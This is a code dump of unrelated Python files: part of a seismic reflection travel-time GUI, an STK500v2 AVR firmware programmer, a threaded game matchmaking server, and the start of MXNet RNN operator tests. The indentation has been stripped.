b = 2 * z * a
c = a * (z ** 2) - (v2 ** 2) * (p2 ** 2) + (v1 ** 2) * (p1 ** 2)
d = 2 * z * ((v2 ** 2) * (p2 ** 2))
e = (v1 ** 2) * (p1 ** 2) - (v2 ** 2) * (p2 ** 2) * (z ** 2)
p = [a, -b, c, d, e]
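# The quartic in x solved below (with sympy's roots()) appears to come from Snell's law for
# the two-layer reflection geometry; only a real root between 0 and the offset is kept, and
# it is converted to a transmission angle in the lower layer further down.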
j = []
for i in range(len(li)):
vlist = list()
v = roots(a * x ** 4 - b[i] * x ** 3 + c[i] * x ** 2 + d[i] * x + e[i], x)
for po in v.keys():
if "I" not in str(po) and po > 0 and po < arr[i]:
vlist.append(po)
j.append(float(vlist[0]))
m = np.asarray(j)
tt = np.arctan(m / p2)
angles = np.degrees(tt)
#Angle check. To inspect the angles, just uncomment the lines below
# inc = (v1/v2)*np.sin(tt)
# angles_inc = np.arcsin(inc)
# angles_inc_degree = np.degrees(angles_inc)
# print('angulos de transmissao', angles)
# print('angulos de incidencia', angles_inc_degree)
# ang_critico2 = np.arcsin(v1/ v2)
# ang_critico_graus2 = ang_critico2 * 180 / np.pi
# print('angulo critico=', ang_critico_graus2)
return angles
def reflect_travel_time(self, nlayer, thick1, i_l1,v1, thick2, i_l2, v2):
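# Two-way reflection travel time per geophone. For a single layer, t = 2*thick1/(v1*cos(i))
# with i the incidence angle at each geophone; for two layers, the transmission angle i_l2 in
# the lower layer is mapped back to the upper layer through Snell's law and the two slant-path
# times are added.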
geo = []
if nlayer == 1:
for i in range(len(i_l1)):
geo.append(i + 1)
d = thick1/np.cos(i_l1*np.pi/180)
t = 2*d/v1
if nlayer == 2:
for i in range(len(i_l2)):
geo.append(i + 1)
d2= thick2/np.cos(i_l2*np.pi/180)
t2 = 2 * d2 / v2
theta1 = np.arcsin((v1/v2)*np.sin(i_l2*np.pi/180))
d1 = thick1 / np.cos(theta1)
t1=2*d1/v1
t = t1+t2
return(geo, t)
if __name__ == '__main__':
app = QtWidgets.QApplication(sys.argv)
dialog = QtWidgets.QMainWindow()
prog = MyFirstGuiProgram(dialog)
dialog.show()
sys.exit(app.exec_())
|
stk500v2.py
|
"""
STK500v2 protocol implementation for programming AVR chips.
The STK500v2 protocol is used by the ArduinoMega2560 and a few other Arduino platforms to load firmware.
This is a python 3 conversion of the code created by David Braam for the Cura project.
"""
import struct
import sys
import time
from serial import Serial # type: ignore
from serial import SerialException
from serial import SerialTimeoutException
from UM.Logger import Logger
from . import ispBase, intelHex
class Stk500v2(ispBase.IspBase):
def __init__(self):
self.serial = None
self.seq = 1
self.last_addr = -1
self.progress_callback = None
def connect(self, port = "COM22", speed = 115200):
if self.serial is not None:
self.close()
try:
self.serial = Serial(str(port), speed, timeout=1, writeTimeout=10000)
except SerialException:
raise ispBase.IspError("Failed to open serial port")
except:
raise ispBase.IspError("Unexpected error while connecting to serial port:" + port + ":" + str(sys.exc_info()[0]))
self.seq = 1
#Reset the controller
for n in range(0, 2):
self.serial.setDTR(True)
time.sleep(0.1)
self.serial.setDTR(False)
time.sleep(0.1)
time.sleep(0.2)
self.serial.flushInput()
self.serial.flushOutput()
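# Enter programming mode (STK500v2 CMD_ENTER_PROGMODE_ISP, 0x10), reset the load address
# (CMD_LOAD_ADDRESS, 0x06) and probe command 0xEE, which the firmware targeted here
# apparently uses to report a flash checksum (see verifyFlash).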
try:
if self.sendMessage([0x10, 0xc8, 0x64, 0x19, 0x20, 0x00, 0x53, 0x03, 0xac, 0x53, 0x00, 0x00]) != [0x10, 0x00]:
raise ispBase.IspError("Failed to enter programming mode")
self.sendMessage([0x06, 0x80, 0x00, 0x00, 0x00])
if self.sendMessage([0xEE])[1] == 0x00:
self._has_checksum = True
else:
self._has_checksum = False
except ispBase.IspError:
self.close()
raise
self.serial.timeout = 5
def close(self):
if self.serial is not None:
self.serial.close()
self.serial = None
#Leave ISP does not reset the serial port, only resets the device, and returns the serial port after disconnecting it from the programming interface.
# This allows you to use the serial port without opening it again.
def leaveISP(self):
if self.serial is not None:
if self.sendMessage([0x11]) != [0x11, 0x00]:
raise ispBase.IspError("Failed to leave programming mode")
ret = self.serial
self.serial = None
return ret
return None
def isConnected(self):
return self.serial is not None
def hasChecksumFunction(self):
return self._has_checksum
def sendISP(self, data):
recv = self.sendMessage([0x1D, 4, 4, 0, data[0], data[1], data[2], data[3]])
return recv[2:6]
def writeFlash(self, flash_data):
# Set the load address to 0; if we have more than 64k of flash we need to enable the address extension
page_size = self.chip["pageSize"] * 2
flash_size = page_size * self.chip["pageCount"]
Logger.log("d", "Writing flash")
if flash_size > 0xFFFF:
self.sendMessage([0x06, 0x80, 0x00, 0x00, 0x00])
else:
self.sendMessage([0x06, 0x00, 0x00, 0x00, 0x00])
load_count = (len(flash_data) + page_size - 1) // page_size
for i in range(0, int(load_count)):
self.sendMessage([0x13, page_size >> 8, page_size & 0xFF, 0xc1, 0x0a, 0x40, 0x4c, 0x20, 0x00, 0x00] + flash_data[(i * page_size):(i * page_size + page_size)])
if self.progress_callback is not None:
if self._has_checksum:
self.progress_callback(i + 1, load_count)
else:
self.progress_callback(i + 1, load_count * 2)
def verifyFlash(self, flash_data):
if self._has_checksum:
self.sendMessage([0x06, 0x00, (len(flash_data) >> 17) & 0xFF, (len(flash_data) >> 9) & 0xFF, (len(flash_data) >> 1) & 0xFF])
res = self.sendMessage([0xEE])
checksum_recv = res[2] | (res[3] << 8)
checksum = 0
for d in flash_data:
checksum += d
checksum &= 0xFFFF
if hex(checksum) != hex(checksum_recv):
raise ispBase.IspError("Verify checksum mismatch: 0x%x != 0x%x" % (checksum & 0xFFFF, checksum_recv))
else:
# Set the load address to 0; if we have more than 64k of flash we need to enable the address extension
flash_size = self.chip["pageSize"] * 2 * self.chip["pageCount"]
if flash_size > 0xFFFF:
self.sendMessage([0x06, 0x80, 0x00, 0x00, 0x00])
else:
self.sendMessage([0x06, 0x00, 0x00, 0x00, 0x00])
load_count = (len(flash_data) + 0xFF) // 0x100
for i in range(0, int(load_count)):
recv = self.sendMessage([0x14, 0x01, 0x00, 0x20])[2:0x102]
if self.progress_callback is not None:
self.progress_callback(load_count + i + 1, load_count * 2)
for j in range(0, 0x100):
if i * 0x100 + j < len(flash_data) and flash_data[i * 0x100 + j] != recv[j]:
raise ispBase.IspError("Verify error at: 0x%x" % (i * 0x100 + j))
def sendMessage(self, data):
message = struct.pack(">BBHB", 0x1B, self.seq, len(data), 0x0E)
for c in data:
message += struct.pack(">B", c)
checksum = 0
for c in message:
checksum ^= c
message += struct.pack(">B", checksum)
try:
self.serial.write(message)
self.serial.flush()
except SerialTimeoutException:
raise ispBase.IspError("Serial send timeout")
self.seq = (self.seq + 1) & 0xFF
return self.recvMessage()
def recvMessage(self):
state = "Start"
checksum = 0
while True:
s = self.serial.read()
if len(s) < 1:
raise ispBase.IspError("Timeout")
b = struct.unpack(">B", s)[0]
checksum ^= b
if state == "Start":
if b == 0x1B:
state = "GetSeq"
checksum = 0x1B
elif state == "GetSeq":
state = "MsgSize1"
elif state == "MsgSize1":
msg_size = b << 8
state = "MsgSize2"
elif state == "MsgSize2":
msg_size |= b
state = "Token"
elif state == "Token":
if b != 0x0E:
state = "Start"
else:
state = "Data"
data = []
elif state == "Data":
data.append(b)
if len(data) == msg_size:
state = "Checksum"
elif state == "Checksum":
if checksum != 0:
state = "Start"
else:
return data
def portList():
ret = []
import winreg as _winreg  # type: ignore
key=_winreg.OpenKey(_winreg.HKEY_LOCAL_MACHINE,"HARDWARE\\DEVICEMAP\\SERIALCOMM") #@UndefinedVariable
i=0
while True:
try:
values = _winreg.EnumValue(key, i) #@UndefinedVariable
except OSError:
return ret
if "USBSER" in values[0]:
ret.append(values[1])
i+=1
return ret
def runProgrammer(port, filename):
""" Run an STK500v2 program on serial port 'port' and write 'filename' into flash. """
programmer = Stk500v2()
programmer.connect(port = port)
programmer.programChip(intelHex.readHex(filename))
programmer.close()
def main():
""" Entry point to call the stk500v2 programmer from the commandline. """
import threading
if sys.argv[1] == "AUTO":
Logger.log("d", "portList(): ", repr(portList()))
for port in portList():
threading.Thread(target=runProgrammer, args=(port,sys.argv[2])).start()
time.sleep(5)
else:
programmer = Stk500v2()
programmer.connect(port = sys.argv[1])
programmer.programChip(intelHex.readHex(sys.argv[2]))
sys.exit(1)
if __name__ == "__main__":
main()
|
__main__.py
|
"""
Multi-threaded match-making game server
"""
import os
import random
from datetime import datetime
import threading
from collections import defaultdict
from referee.log import StarLog
from referee.game import play, IllegalActionException, COLOURS, NUM_PLAYERS
from benchmark import RandomPlayer, GreedySpreadPlayer
from battleground.protocol import DisconnectException, ProtocolException
from battleground.protocol import Connection, MessageType as M
from battleground.protocol import DEFAULT_SERVER_PORT
# The following channels are reserved, and choosing them results in playing
# a game with server-controlled players:
SPECIAL_CHANNELS = {
'random': (lambda p: [ServerPlayer(RandomPlayer, 'random_bot'), p]),
'greedy': (lambda p: [ServerPlayer(GreedySpreadPlayer, 'greedy_bot'), p]),
}
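# (Another server-controlled opponent would just be another entry here, e.g. a
# hypothetical 'smart' channel mapping to
# lambda p: [ServerPlayer(SomeSmarterPlayer, 'smart_bot'), p], where
# SomeSmarterPlayer stands in for any Player class with the same interface as
# the benchmark players.)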
# Print at a higher level of verbosity, including some debugging information
DEBUG = False # The matchmaking system seems to have been working well since 2019.
# # # #
# Main thread: listen for incoming connections.
#
#
def main():
out = StarLog(level=1+DEBUG, timefn=lambda: f'Thread-0 {datetime.now()}')
out.comment("initialising server", depth=-1)
# set up a shared matchmaking pool
pool = MatchmakingPool(num_players=NUM_PLAYERS,
special_channels=SPECIAL_CHANNELS)
# listen for connections incoming on PORT:
try:
# Host of "" allows all incoming connections on the chosen port
connections = Connection.iter_listen(host="", port=DEFAULT_SERVER_PORT)
out.comment(f"listening on port {DEFAULT_SERVER_PORT}...")
for connection, address in connections:
# repeatedly accept a new connection, and hand off to a new thread
out.comment("new client connected: ", address)
out.comment("starting a new thread to handle this client...")
handler = threading.Thread(target=servant, args=(connection, pool))
handler.daemon = True # so that this thread exits when main exits
handler.start()
except KeyboardInterrupt:
print() # end line
out.comment("bye!")
# # # #
# Worker thread: Coordinate the matchmaking process and, if the client is the
# player that allows a game to begin, coordinate that game to conclusion.
#
def servant(connection, pool):
# (Each thread gets its own print function, which includes its thread number)
timefn = lambda: f'{threading.current_thread().name} {datetime.now()}'
out = StarLog(level=1+DEBUG, timefn=timefn)
out.comment("hello, world!")
# # #
# Initiate connection
#
# At your service, client! Let us begin the protocol
# First, could you kindly send me a PLAY request containing your
# name and matchmaking channel?
out.comment("begin communication with player", depth=-1)
out.comment("waiting for PLAY request...")
try:
playmsg = connection.recv(M.PLAY)
out.comment("successfully received PLAY request:", playmsg)
out.comment("sending OKAY back.")
connection.send(M.OKAY)
except DisconnectException:
out.comment("client disconnected. bye!")
connection.disconnect()
return
except ProtocolException as e:
out.comment("protocol error! that was unexpected...? bye!")
connection.disconnect()
return
# Now that you're officially a player, let's wrap you up in an object so
# that we won't forget your name.
new_player = NetworkPlayer(connection, playmsg['name'])
# And we'll need to note that channel for matchmaking purposes!
channel = playmsg['channel']
# # #
# Conduct matchmaking
#
# Okay then. Now, if it pleases you just to wait one moment, I'll look for
# some suitable opponents for you to play with...
out.comment("looking for opponents...", depth=-1)
try:
players = pool.match(channel, new_player, out)
out.comment("opponents found!")
except NotEnoughPlayers:
# I'm afraid this is as far as I can take you, good sir/madam.
# If you wait here for just a short time, I'm sure another thread
# will come by and pick you up quite soon.
# It has been my eternal pleasure. Farewell~ Your humble servant.
out.comment("leaving in pool for another thread. bye~!")
return
# # #
# Initialise all players, prepare for game
#
# Splendid! Between the few of you, we have enough players for a game!
# Who will take the first turn? Let us cast the proverbial die:
out.comment("randomly assigning colours to players...")
random.shuffle(players)
cols_players = list(zip(COLOURS, players))
# Then, shall we introduce you to one another?
col_name_map = {colour: player.name for colour, player in cols_players}
for colour, player in cols_players:
player.game(col_name_map, out.comment)
# What name shall we give to this glorious playing?
player_names = '_and_'.join(p.name for p in players)
timestamp = str(datetime.now())[:19].replace(' ', '_').replace(':', '-')
game_name = f"logs/game_at_{timestamp}_with_{player_names}.txt"
# Attempt to make sure there is a 'logs' folder ready for the game log
try: os.mkdir('logs')
except OSError: pass
# # #
# Play game, handle result
#
# Without further ado, let us begin!
try:
result = play(players,
logfilename=game_name,
out_function=out.comment,
print_state=False)
# What a delightful result! I hope that was an enjoyable game
# for all of you. Let's share the final result.
out.comment("game over!", depth=-1)
out.comment(result)
out.comment("sending out result...")
for player in players:
player.game_over(result=result)
except IllegalActionException:
# Ah! The game has ended early. We had better
# make sure everyone is on the same page:
out.comment("game error", depth=-1)
out.comment("game error: invalid action")
for player in players:
player.game_over(result="game error: invalid action")
except DisconnectException:
# In the unfortunate event of a disconnection, we had better
# make sure everyone is on the same page:
out.comment("connection error", depth=-1)
out.comment("a client disconnected")
for player in players:
try:
player.error(reason="opponent disconnected")
except BrokenPipeError:
# this connection must have been the one that reset; skip it
continue
except ProtocolException as e:
out.comment("protocol error!", depth=-1)
out.comment(e)
out.comment("a client did something unexpected")
for player in players:
player.error(reason="opponent broke protocol")
# # #
# Terminate all players
#
# One way or another, that's the end of this meeting. Until next time, my
# good friends! It has been my deepest pleasure~
out.comment("disconnection", depth=-1)
out.comment("disconnecting players...")
for player in players:
player.disconnect()
out.comment("end of thread. bye~")
# # #
# Player wrappers
#
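# For reference, the per-game message exchange these wrappers drive (as
# implemented in this file) is: the server sends GAME with the colour/name map,
# then INIT to each player (answered with OKAY), then for every move a TURN is
# sent to the player on move and an ACTN reply is awaited, each move is
# broadcast with UPD8 (answered with OKAY), and the game ends with OVER on a
# normal result or ERRO on a protocol/connection problem.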
class NetworkPlayer:
"""A Player wrapper for network-controlled players"""
def __init__(self, connection, name):
self.connection = connection
self.name = name
self.player_str = f"{self.name} (not yet initialised)"
def ping(self, timeout=None):
self.connection.send(M.OKAY)
self.connection.recv(M.OKAY, timeout=timeout)
def game(self, colour_name_map, log_function):
self.log = log_function
self.log(self.player_str, 'sending GAME')
self.connection.send(M.GAME, **colour_name_map)
def init(self, colour):
self.colour = colour
self.player_str = f"{self.name} ({colour})"
self.log(self.player_str, 'sending INIT')
self.connection.send(M.INIT, colour=colour)
self.connection.recv(M.OKAY)
def action(self):
self.log(self.player_str, 'sending TURN')
self.connection.send(M.TURN)
self.log(self.player_str, 'waiting for ACTN')
actnmsg = self.connection.recv(M.ACTN)
self.log(self.player_str, 'received ACTN:', actnmsg)
return actnmsg['action']
def update(self, colour, action):
self.log(self.player_str, 'sending UPD8')
self.connection.send(M.UPD8, colour=colour, action=action)
self.log(self.player_str, 'waiting for OKAY')
self.connection.recv(M.OKAY)
def game_over(self, result):
self.log(self.player_str, 'sending OVER')
self.connection.send(M.OVER, result=result)
def error(self, reason):
self.log(self.player_str, 'sending ERRO')
self.connection.send(M.ERRO, reason=reason)
def disconnect(self):
self.log(self.player_str, 'disconnecting')
self.connection.disconnect()
class ServerPlayer:
"""A Player wrapper for locally-controlled players"""
def __init__(self, Player, name):
self.Player = Player
self.name = name
def game(self, _colour_name_map, log_function):
self.log = log_function
def init(self, colour):
self.colour = colour
self.player_str = f"{self.name} ({colour})"
self.log(self.player_str, 'initialising', colour)
self.player = self.Player(colour)
def action(self):
self.log(self.player_str, 'asking for action')
action = self.player.action()
self.log(self.player_str, 'got:', action)
return action
def update(self, colour, action):
self.log(self.player_str, 'updating with', colour, action)
self.player.update(colour, action)
def game_over(self, result):
pass
def error(self, reason):
pass
def disconnect(self):
pass
# # #
# Matchmaking code
#
class MatchmakingPool:
"""
A collection of per-channel waiting lists, with concurrent access control.
Submit your player to a channel with the match method, and receive either
a NotEnoughPlayers exception or a list of num_players previously deposited.
Notes:
* Thread safe (I think)
* Does not automatically clear stale connections out of channel waiting
lists until a new player is submitted to that channel. Therefore, an
attack exists where a client can run up memory usage by repeatedly
submitting players to obscure channels, and then disconnecting.
"""
def __init__(self, num_players, special_channels):
self._lock = threading.RLock()
self._waiting = defaultdict(list)
self.num_players = num_players
self.special_channels = special_channels
def match(self, channel, new_player, out):
"""
Submit a 'new_player' (Player wrapper) to look for games on 'channel'.
If there are already players waiting from previous match calls, or if
'channel' is a special channel, then return a full list of players
(including 'new_player').
If there are not enough players yet, leave 'new_player' in the pool
for a future match call and raise a NotEnoughPlayers exception.
"""
# if it's a special channel, we don't need to wait for players,
# the server can provide some:
if channel in self.special_channels:
return self.special_channels[channel](new_player)
# otherwise, we do need to match-make as usual:
with self._lock:
out.debug("matchmaking pool before filter:", self._waiting)
# clean out any players who have since disconnected
channel_waiting = self._filter(channel, out)
# deposit THIS new player in the queue too,
channel_waiting.append(new_player)
# okay, are there enough players waiting to play a game?
if len(channel_waiting) < self.num_players:
# no; alert the caller
out.comment("not enough players!")
out.debug("pool after filter:", self._waiting)
raise NotEnoughPlayers()
else:
# yes! extract this queue from the waiting pool
del self._waiting[channel]
out.comment("match found!")
out.debug("pool after filter:", self._waiting)
# and return these players to the caller!
return channel_waiting
def _filter(self, channel, out=None):
with self._lock:
still_waiting = []
for player in self._waiting[channel]:
try:
player.ping(timeout=10)
# contact! they're still online! re-add them to the pool:
still_waiting.append(player)
except (OSError,
BrokenPipeError, # the connection has gone stale?
DisconnectException, # the client closed the connection
ProtocolException # the client... did what?
) as e:
# in any case, close this connection and don't keep this
# client in the pool.
if out is not None:
out.comment("ditching client", player, "due to",
e.__class__.__name__, e)
player.connection.disconnect()
self._waiting[channel] = still_waiting
return still_waiting
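# A minimal usage sketch of MatchmakingPool (illustrative only; 'some_player'
# and 'out' stand for a Player wrapper and a StarLog as used in servant above):
#
#   pool = MatchmakingPool(num_players=NUM_PLAYERS, special_channels={})
#   try:
#       players = pool.match("casual", some_player, out)
#   except NotEnoughPlayers:
#       pass  # some_player stays in the pool for a later match() call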
class NotEnoughPlayers(Exception):
"""For when there are not enough players waiting in a particular channel"""
if __name__ == '__main__':
main()
|
test_operator.py
|
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: skip-file
from __future__ import print_function
from __future__ import division
import numpy as np
import mxnet as mx
import copy
import math
import random
import itertools
from distutils.version import LooseVersion
from numpy.testing import assert_allclose, assert_array_equal
from mxnet.test_utils import *
from mxnet.operator import *
from mxnet.base import py_str, MXNetError, _as_list
from common import setup_module, with_seed, teardown, assert_raises_cudnn_not_satisfied, assert_raises_cuda_not_satisfied, assertRaises
from common import run_in_spawned_process
from nose.tools import assert_raises, ok_
import unittest
import os
def check_rnn_consistency(cell1, cell2, T, N, I, H, grad_req, rtol=1e-2, atol=1e-4):
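# Unrolls both cell implementations over the same random batch and asserts that
# their inference outputs, training outputs, and (unless grad_req is 'null')
# input gradients agree within the given tolerances.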
dshape = (N, T, I)
data = mx.sym.Variable('data')
Y1, _ = cell1.unroll(T, data, layout='NTC', merge_outputs=True)
mod1 = mx.mod.Module(Y1, label_names=None, context=default_context())
mod1.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
Y2, _ = cell2.unroll(T, data, layout='NTC', merge_outputs=True)
mod2 = mx.mod.Module(Y2, label_names=None, context=default_context())
mod2.bind(data_shapes=[('data', dshape)], label_shapes=None, inputs_need_grad=True, grad_req=grad_req)
mod1.init_params()
args, auxs = mod1.get_params()
args = cell1.unpack_weights(args)
args = cell2.pack_weights(args)
mod2.set_params(args, auxs)
x = mx.random.uniform(shape=dshape)
batch=mx.io.DataBatch(data=[x])
# check inference
mod1.forward(batch, is_train=False)
mod2.forward(batch, is_train=False)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
# check training
mod1.forward(batch, is_train=True)
mod2.forward(batch, is_train=True)
assert_allclose(mod1.get_outputs()[0].asnumpy(), mod2.get_outputs()[0].asnumpy(), rtol=rtol, atol=atol)
dy = mx.random.uniform(shape=mod1.get_outputs()[0].shape)
mod1.backward(out_grads=[dy])
mod2.backward(out_grads=[dy])
if type(grad_req) is dict and grad_req['data'] == 'null' or grad_req == 'null':
assert mod1.get_input_grads()[0] is None
assert mod2.get_input_grads()[0] is None
else:
assert_allclose(mod1.get_input_grads()[0].asnumpy(), mod2.get_input_grads()[0].asnumpy(), rtol=rtol, atol=atol)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnn_with_new_param():
rnn_modes = ['rnn_relu', 'rnn_tanh', 'gru', 'lstm']
ngates_ = [1, 1, 3, 4]
num_layers, input_size, seq_len, batch_size, state_size = 3, 128, 5, 64, 8
for bidirectional in [False, True]:
directions = 2 if bidirectional else 1
for mode, ngates in zip(rnn_modes, ngates_):
first_layer_size = (input_size * state_size + state_size * state_size + state_size * 2) * ngates
rest_layer_size = (state_size * directions * state_size + state_size * state_size + state_size * 2) \
* ngates * (num_layers - 1)
param_size = (first_layer_size + rest_layer_size) * directions
sym = mx.sym.RNN(mode=mode, num_layers=num_layers, bidirectional=bidirectional,
state_outputs=False, state_size=state_size, name='rnn')
bind_dict = {
'rnn_data': mx.ndarray.random.uniform(low=-1, high=1, shape=(seq_len, batch_size, input_size)),
'rnn_parameters': mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size)),
'rnn_state': mx.ndarray.zeros(shape=(num_layers * directions, batch_size, state_size))
}
if mode == 'lstm':
bind_dict['rnn_state_cell'] = mx.ndarray.zeros(
shape=(num_layers * directions, batch_size, state_size))
ex = sym.bind(default_context(), bind_dict)
ex.forward(is_train=True)
ex01 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex02 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex01, ex02, rtol=1e-2, atol=1e-4)
bind_dict['rnn_parameters'] = mx.ndarray.random.uniform(low=-1, high=1, shape=(param_size))
ex.copy_params_from(bind_dict)
ex.forward(is_train=True)
ex03 = ex.output_dict['rnn_output'].asnumpy()
ex.forward(is_train=False)
ex04 = ex.output_dict['rnn_output'].asnumpy()
assert_allclose(ex03, ex04, rtol=1e-2, atol=1e-4)
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='lstm', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.LSTMCell(H, prefix='l0_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l1_'))
stack.add(mx.rnn.LSTMCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_lstm_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='lstm',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l0_'),
mx.rnn.LSTMCell(H, prefix='r0_'),
output_prefix='bi_lstm_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.LSTMCell(H, prefix='l1_'),
mx.rnn.LSTMCell(H, prefix='r1_'),
output_prefix='bi_lstm_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
check_rnn_consistency(fused, stack, T, N, I, H, {'data': 'add', 'parameters': 'null'})
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='gru', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.GRUCell(H, prefix='l0_'))
stack.add(mx.rnn.GRUCell(H, prefix='l1_'))
stack.add(mx.rnn.GRUCell(H, prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_gru_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='gru',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l0_'),
mx.rnn.GRUCell(H, prefix='r0_'),
output_prefix='bi_gru_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.GRUCell(H, prefix='l1_'),
mx.rnn.GRUCell(H, prefix='r1_'),
output_prefix='bi_gru_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_sym():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_tanh', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='tanh', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnntanh_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_tanh',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l0_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r0_'),
output_prefix='bi_rnntanh_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='tanh', prefix='l1_'),
mx.rnn.RNNCell(H, activation='tanh', prefix='r1_'),
output_prefix='bi_rnntanh_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_sym():
T, N, I, H = 5, 32, 200, 200
fused = mx.rnn.FusedRNNCell(H, num_layers=3, mode='rnn_relu', get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l0_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l1_'))
stack.add(mx.rnn.RNNCell(H, activation='relu', prefix='l2_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write')
check_rnn_consistency(fused, stack, T, N, I, H, 'add')
check_rnn_consistency(fused, stack, T, N, I, H, 'null')
@with_seed()
@assert_raises_cudnn_not_satisfied(min_version='5.1.10')
def test_rnnrelu_bidirectional():
Ts = [1, 5]
Ns = [1, 32]
Is = [32, 128, 512]
Hs = [32, 128, 512]
for T, N, I, H in itertools.product(Ts, Ns, Is, Hs):
fused = mx.rnn.FusedRNNCell(H, num_layers=2, mode='rnn_relu',
bidirectional=True, get_next_state=True, prefix='')
stack = mx.rnn.SequentialRNNCell()
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l0_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r0_'),
output_prefix='bi_rnnrelu_0_'))
stack.add(mx.rnn.BidirectionalCell(
mx.rnn.RNNCell(H, activation='relu', prefix='l1_'),
mx.rnn.RNNCell(H, activation='relu', prefix='r1_'),
output_prefix='bi_rnnrelu_1_'))
check_rnn_consistency(fused, stack, T, N, I, H, 'write', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'add', rtol=1e-2, atol=1e-2)
check_rnn_consistency(fused, stack, T, N, I, H, 'null', rtol=1e-2, atol=1e-2)
@with_seed()
def test_lstm_dropout():
X = mx.sym.Variable('x')
